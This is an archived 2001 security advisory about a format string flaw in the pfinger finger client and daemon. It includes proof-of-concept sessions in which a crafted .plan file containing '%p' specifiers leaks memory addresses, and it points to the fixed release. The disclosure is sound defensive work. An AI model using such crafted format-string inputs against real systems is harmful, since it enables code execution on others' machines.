TUCoPS :: Unix :: General :: unix4952.htm

pfinger format string vulnerability
21th Dec 2001 [SBWID-4952]
COMMAND

	pfinger format string vulnerability

SYSTEMS AFFECTED

	pfinger <= 0.7.7

PROBLEM

	A format string vulnerability in pfinger,  a  finger  daemon,  has  been
	discovered and published in INTEXXIA SECURITY ADVISORY ID  #1050-181201,
	by Guillaume Pelat.
	

	Both client and server  are  vulnerable  to  a  format  string  injection
	using for example a \'.plan\' file.
	

	Client side : the client uses directly the data received from  the  server
	as the first argument of the printf(3) function. A user could  create  a
	specially crafted \'.plan\' file that would be printed  by  the  pfinger
	client. As a result, it could  be  possible  to  make  execute  arbitrary
	code by the client.
	

	Server side : if the server is configured to connect to a master  server
	(with the <sitehost> directive), data received from the  master  server
	are directly used as first argument in  the  printf(3)  function.  If  a
	malicious user modifies the master to make it send crafted data,  it  is
	possible to make execute code to the vulnerable \'slave\' server.
	

	If a user has an account on the master server, he can create  a  crafted
	\'.plan\' file containing the format string.  A  simple  request  to  the
	\'client\' server would also exploit the server side vulnerability.
	

	The pfinger daemon is launched with  \'nobody\'  permissions  by  default.
	Complete exploitation of this  vulnerability  will  permit  an  attacker
	to execute code with the \'nobody\' permissions. But this flaw  could  be
	used to compromize the local system by exploiting other local  vulnerabilities.
	

	

	PROOF OF CONCEPT ================
	

	Here are two proofs of concept for the both sides.
	

	Client side :
	

	

	evil@test:~$ cat ~/.plan 

	Now a little format string: %p %p %p :-)

	evil@test:~$ 

	

	good@test:~$ finger -l evil

	Login Name: evil                In real life: Evil

	Login    Name                   Status  Login time Host

	evil     Evil                   active  Mon 08:02  test

	No mail.

	Plan:

	Now a little format string: 0x8049da0 0x640 0x400a252d :-)

	good@test:~$

	

	

	Server side :
	

	

	good@test:~$ cat /etc/fingerconf

	<fingerconf>

	<sitehost>master</sitehost>

	</fingerconf>

	

	evil@master:~$ cat ~/.plan

	Now a little format string: %p %p %p :-)

	evil@master:~$ telnet test 79

	Trying x.x.x.x...

	Connected to test.lab.intexxia.com.

	Escape character is \'^]\'.

	/W evil

	Login Name: evil                        In real life: Evil

	Login    Name                   Status  Login time Host

	evil     Evil                   active  Mon 08:02  master

	No mail.

	Plan:

	Now a little format string: 0xbfbff860 0x400 0x0 :-)

	Connection closed by foreign host.

	evil@master:~$

	

	

SOLUTION

	A new version has been released  which  corrects  this  security  issue.
	pfinger version 0.7.8 is available at :
	

	http://www.xelia.ch/unix/pfinger/

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH